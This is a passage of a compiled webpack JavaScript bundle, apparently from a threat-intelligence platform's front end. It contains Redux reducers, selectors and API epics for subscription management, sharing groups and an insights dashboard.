  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* FETCH_TEMPLATES */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* FETCH_SUBSCRIPTIONS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* FETCH_COMPANY_SUBSCRIPTIONS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* ACTIVATE */]:
    case __WEBPACK_IMPORTED_MODULE_2_modules_templates_action_types_js__["d" /* FETCH */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["r" /* FETCH_TEMPLATES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* FETCH_TEMPLATES_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["o" /* FETCH_SUBSCRIPTIONS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["n" /* FETCH_SUBSCRIPTIONS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* FETCH_COMPANY_SUBSCRIPTIONS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* FETCH_COMPANY_SUBSCRIPTIONS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* ACTIVATE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* ACTIVATE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2_modules_templates_action_types_js__["f" /* FETCH_SUCCESS */]:
      return false;
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_4__types_js__["c" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["s" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  templates: templates,
  managedSubscriptions: managedSubscriptions,
  loading: loading,
  options: options
}));

/***/ }),
/* 2934 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(717);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(357);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__subscriptions_types__ = __webpack_require__(499);









var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:subscription-management:epics'); // eslint-disable-line no-unused-vars

/** Fetch all Templates */
var fetchTemplatesEpic = function fetchTemplatesEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["p" /* FETCH_TEMPLATES */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_4__types_js__["a" /* MARKETPLACE_ENDPOINT */] + '/manage').map(function (_ref2) {
      var response = _ref2.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_SUBSCRIPTIONS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["n" /* FETCH_SUBSCRIPTIONS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/** Fetch all subscriptions to be managed by Admins - SLOW PERFORMANCE */
var fetchSubscriptionsEpic = function fetchSubscriptionsEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["m" /* FETCH_SUBSCRIPTIONS */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_4__types_js__["a" /* MARKETPLACE_ENDPOINT */] + '/manage').map(function (_ref4) {
      var response = _ref4.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_SUBSCRIPTIONS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["n" /* FETCH_SUBSCRIPTIONS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/** Fetch all subscriptions of a company */
var fetchSubscriptionsByCompanyEpic = function fetchSubscriptionsByCompanyEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* FETCH_COMPANY_SUBSCRIPTIONS */], __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* ACTIVATE_SUCCESS */]).mergeMap(function (_ref6) {
    var companyGuid = _ref6.payload.companyGuid;
    return ajax.get(__WEBPACK_IMPORTED_MODULE_4__types_js__["a" /* MARKETPLACE_ENDPOINT */] + '/manage/' + companyGuid).map(function (_ref7) {
      var response = _ref7.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* FETCH_COMPANY_SUBSCRIPTIONS_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* FETCH_COMPANY_SUBSCRIPTIONS_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/** Activate a feed, based on its enclaveGuid and companyGuid */
var activateEpic = function activateEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* ACTIVATE */]).mergeMap(function (_ref9) {
    var _ref9$payload = _ref9.payload,
        enclaveGuid = _ref9$payload.enclaveGuid,
        companyGuid = _ref9$payload.companyGuid;
    return ajax.post(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["querystring"])({ enclaveGuid: enclaveGuid, companyGuid: companyGuid }, __WEBPACK_IMPORTED_MODULE_4__types_js__["a" /* MARKETPLACE_ENDPOINT */] + '/manage/activate')).map(function (_ref10) {
      var response = _ref10.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* ACTIVATE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'Subscription activated successfully.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* ACTIVATE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Subscription activation failed.' }
        }
      });
    });
  });
};

/** Send activation confirmation email for a feed, based on its enclaveGuid and companyGuid */
var emailActivateEpic = function emailActivateEpic(action$, store, _ref11) {
  var ajax = _ref11.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* EMAIL_ACTIVATE */]).mergeMap(function (_ref12) {
    var _ref12$payload = _ref12.payload,
        enclaveGuid = _ref12$payload.enclaveGuid,
        companyGuid = _ref12$payload.companyGuid;
    return ajax.postJSON(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["querystring"])({ enclaveGuid: enclaveGuid, companyGuid: companyGuid }, __WEBPACK_IMPORTED_MODULE_4__types_js__["a" /* MARKETPLACE_ENDPOINT */] + '/email-activate')).map(function (_ref13) {
      var response = _ref13.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* EMAIL_ACTIVATE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'Activation emailed successfully.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["h" /* EMAIL_ACTIVATE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Activation email failed.' }
        }
      });
    });
  });
};

/** Unsubscribe to a specific subscription, based on its feedGuid, companyGuid, and requiredState (ACTIVE or CANCEL)  */
var adminUnsubscribeEpic = function adminUnsubscribeEpic(action$, store, _ref14) {
  var ajax = _ref14.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* ADMIN_UNSUBSCRIBE */]).mergeMap(function (_ref15) {
    var _ref15$payload = _ref15.payload,
        feedGuid = _ref15$payload.feedGuid,
        companyGuid = _ref15$payload.companyGuid,
        requiredState = _ref15$payload.requiredState;
    return ajax.post(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["querystring"])({ companyGuid: companyGuid, requiredState: requiredState }, __WEBPACK_IMPORTED_MODULE_6__subscriptions_types__["SUBSCRIPTIONS_ENDPOINT"] + '/manage/' + feedGuid + '/unsubscribe')).map(function (_ref16) {
      var response = _ref16.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* ADMIN_UNSUBSCRIBE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'Successfully unsubscribed.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* ADMIN_UNSUBSCRIBE_FAILURE */],
        payload: err,
        meta: {
          alert: { type: 'error', text: 'An error occurred while unsubscribing.' }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchSubscriptionsEpic, fetchSubscriptionsByCompanyEpic, activateEpic, emailActivateEpic, adminUnsubscribeEpic));

/***/ }),
/* 2935 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sharingGroups", function() { return sharingGroups; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sharingGroup", function() { return sharingGroup; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValues", function() { return getInitialFormValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companies", function() { return companies; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sharingGroupFormOptions", function() { return sharingGroupFormOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils__ = __webpack_require__(1301);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types__ = __webpack_require__(355);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_immutable__ = __webpack_require__(1);








var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['groups', 'loading']);

// get all sharing groups, alphebatized by name
var sharingGroups = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['groups', 'sharingGroups']), function (groups) {
  return groups.sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
});

// get sharing group by guid
var sharingGroup = function sharingGroup(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(sharingGroups, Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["get"])(guid, Object(__WEBPACK_IMPORTED_MODULE_5_immutable__["List"])()));
};

// determine initial form values for sharing group add/edit form
var getInitialFormValues = function getInitialFormValues(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(sharingGroup(guid), Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(function (group) {
    return group || Object(__WEBPACK_IMPORTED_MODULE_3__types__["SharingGroup"])();
  }, function (group) {
    return {
      name: group.get('name'),
      description: group.get('description')
    };
  }));
};

// get companies for group
var companies = function companies(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(sharingGroup(guid), Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(function (group) {
    return group || Object(__WEBPACK_IMPORTED_MODULE_3__types__["SharingGroup"])();
  }, Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["get"])('companies', Object(__WEBPACK_IMPORTED_MODULE_5_immutable__["List"])()), function (companies) {
    return companies.sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
  }));
};

// get sharing group options for form
var sharingGroupFormOptions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(sharingGroups, function (sharingGroups) {
  return sharingGroups.toList().map(__WEBPACK_IMPORTED_MODULE_2__utils__["a" /* sharingGroupToFormOptions */]).toJS();
});

/***/ }),
/* 2936 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export sharingGroups */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(718);





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:groups:stores'); // eslint-disable-line no-unused-vars




var sharingGroups = function sharingGroups() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUCCESS */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_SUCCESS */]:
      return state.delete(payload); // The ID to be deleted
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* EDIT_SUCCESS */]:
      return state.set(payload.get('guid'), payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* SAVE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* EDIT */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* EDIT_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* FETCH_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* SAVE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* EDIT_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* DELETE_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  sharingGroups: sharingGroups,
  loading: loading
}));

/***/ }),
/* 2937 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export ENDPOINT */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__action_types_js__ = __webpack_require__(718);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__types_js__ = __webpack_require__(355);







var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:groups:epics'); // eslint-disable-line no-unused-vars




var ENDPOINT = '/services/sharing-groups';

var fromJSON = function fromJSON(response) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(response).map(__WEBPACK_IMPORTED_MODULE_7__types_js__["SharingGroup"]).toOrderedMap().mapKeys(function (k, v) {
    return v.get('guid');
  });
};

var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["g" /* FETCH */]).mergeMap(function (_ref2) {
    var payload = _ref2.payload;
    return ajax.get(ENDPOINT).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(fromJSON).map(function (groups) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["i" /* FETCH_SUCCESS */],
        payload: groups
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["h" /* FETCH_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var saveEpic = function saveEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["j" /* SAVE */]).mergeMap(function (_ref4) {
    var payload = _ref4.payload;
    return ajax.postJSON(ENDPOINT, payload.toJSON()).map(function (_ref5) {
      var response = _ref5.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["l" /* SAVE_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"], __WEBPACK_IMPORTED_MODULE_7__types_js__["SharingGroup"])(response),
        meta: {
          alert: { type: 'success', text: 'Sharing group saved.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["k" /* SAVE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: {
            type: 'error',
            text: 400 <= err.status && err.status < 500 ? Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['xhr', 'response', 'message'], err) : 'Could not save sharing group.'
          }
        }
      });
    });
  });
};

var updateEpic = function updateEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["d" /* EDIT */]).mergeMap(function (_ref7) {
    var payload = _ref7.payload;
    return ajax.putJSON(ENDPOINT + '/' + payload.get('guid'), payload.toJSON()).map(function (_ref8) {
      var response = _ref8.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["f" /* EDIT_SUCCESS */],
        payload: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(response),
        meta: {
          alert: { type: 'success', text: 'Sharing group updated.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["e" /* EDIT_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: {
            type: 'error',
            text: Object(__WEBPACK_IMPORTED_MODULE_5_trustar_utils__["parseServerErrorMessage"])(err, 'Could not update sharing group.')
          }
        }
      });
    });
  });
};

var deleteEpic = function deleteEpic(action$, store, _ref9) {
  var ajax = _ref9.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["a" /* DELETE */]).mergeMap(function (_ref10) {
    var payload = _ref10.payload;
    return ajax.delete(ENDPOINT + '/' + payload).map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* DELETE_SUCCESS */],
        payload: String(payload),
        meta: {
          alert: { type: 'success', text: 'Sharing group removed.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["b" /* DELETE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not remove sharing group.' }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(fetchEpic, saveEpic, updateEpic, deleteEpic));

/***/ }),
/* 2938 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export defaultTimeRange */
/* unused harmony export initialState */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils_dashboard_js__ = __webpack_require__(500);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(358);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(1320);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };








/* Data for each block of insights */
var defaultInsightsState = {
  data: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  status: null,
  from: null,
  to: null,
  range: '6 Months',
  loading: 'all',
  elementCount: 0,
  pageNumber: 0,
  pageSize: 10,
  totalElements: 50
};

var defaultTimeRange = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
  category: null,
  showCustom: false,
  dateSince: null,
  dateUntil: null,
  daysBack: null
});

/* Overall store shape */
var initialState = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({
  enclaveCorrelations: defaultInsightsState,
  communityCorrelations: defaultInsightsState,
  enclaveIoCs: defaultInsightsState,
  communityTrendingIocs: defaultInsightsState,
  malware: defaultInsightsState,
  cves: defaultInsightsState,
  meta: {
    view: {
      category: 'enclaveCorrelations',
      panel: 'insights'
    },
    timeRange: defaultTimeRange,
    savedRanges: {
      insights: _extends({}, Object(__WEBPACK_IMPORTED_MODULE_3__epics_js__["b" /* generateDefaultRange */])()),
      trends: _extends({}, Object(__WEBPACK_IMPORTED_MODULE_3__epics_js__["b" /* generateDefaultRange */])())
    },
    enclaveSelection: {
      menuOpen: false,
      enclaveId: null,
      enclaveName: null,
      defaultEnclaveName: null
    }
  }
});

/* harmony default export */ __webpack_exports__["a"] = (function () {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : initialState;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["e" /* FETCH_TIME_RANGE_SUCCESS */]:
      // TODO: Move this capitalization logic for CVEs to the server for all IOC queries
      var data = payload.data.get('data');
      if (payload.category === 'cves') {
        data = data.map(function (v) {
          return v.update('title', function (t) {
            return t.toUpperCase();
          });
        });
      }
      return state.update(payload.category, function (s) {
        return s.set('loading', false).merge(payload.data).set('data', data);
      });
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* FETCH_TIME_RANGE_FAILURE */]:
      return state.update(payload.category, function (s) {
        return s.set('loading', 'error');
      });
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["m" /* SET_DATE_OPTIONS */]:
      return state.mergeIn(['meta', 'timeRange'], payload).setIn(['meta', 'enclaveSelection', 'menuOpen'], false);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* PAGINATE */]:
      return state.update(payload.category, function (s) {
        return s.set('loading', 'pagination');
      }).setIn(['meta', 'timeRange'], defaultTimeRange);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["h" /* PAGINATE_SUCCESS */]:
      return state.update(payload.category, function (s) {
        return s.set('loading', false).update('data', function (d) {
          return d.concat(payload.data);
        }).merge(payload.meta);
      });
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["g" /* PAGINATE_FAILURE */]:
      return state.update(payload.category, function (s) {
        return s.set('loading', false);
      });
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_TIME_RANGE */]:
      var category = payload.category,
          from = payload.from,
          to = payload.to;

      var dateRange = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_dashboard_js__["a" /* calculateDayRange */])(from, to);
      return state.setIn(['meta', 'timeRange'], defaultTimeRange).update(category, function (s) {
        return s.set('to', to).set('from', from).set('range', dateRange).set('loading', 'all');
      });
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["k" /* SAVE_DEFAULT_ENCLAVE */]:
      var id = payload.id,
          name = payload.name;

      return state.setIn(['meta', 'enclaveSelection', 'enclaveId'], id).setIn(['meta', 'enclaveSelection', 'enclaveName'], name).setIn(['meta', 'enclaveSelection', 'defaultEnclaveName'], name);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["o" /* SET_ENCLAVE_MENU */]:
      return state.setIn(['meta', 'timeRange'], defaultTimeRange).setIn(['meta', 'enclaveSelection', 'menuOpen'], action.payload);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["l" /* SELECT_ENCLAVE */]:
      return state.setIn(['meta', 'enclaveSelection', 'menuOpen'], false).setIn(['meta', 'enclaveSelection', 'enclaveId'], payload.id).setIn(['meta', 'enclaveSelection', 'enclaveName'], payload.name);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["p" /* SET_VIEW_OPTIONS */]:
      return state.mergeIn(['meta', 'view'], payload);
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["j" /* SAVE_DATE_RANGE */]:
      {
        var _category = payload.category,
            _from = payload.from,
            _to = payload.to;

        return state.mergeIn(['meta', 'savedRanges', _category], Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({ from: _from, to: _to }));
      }
    default:
      return state;
  }
});

/***/ }),
/* 2939 */,
/* 2940 */,
/* 2941 */,
/* 2942 */,
/* 2943 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export options */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(506);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types_js__ = __webpack_require__(895);









var options = function options() {
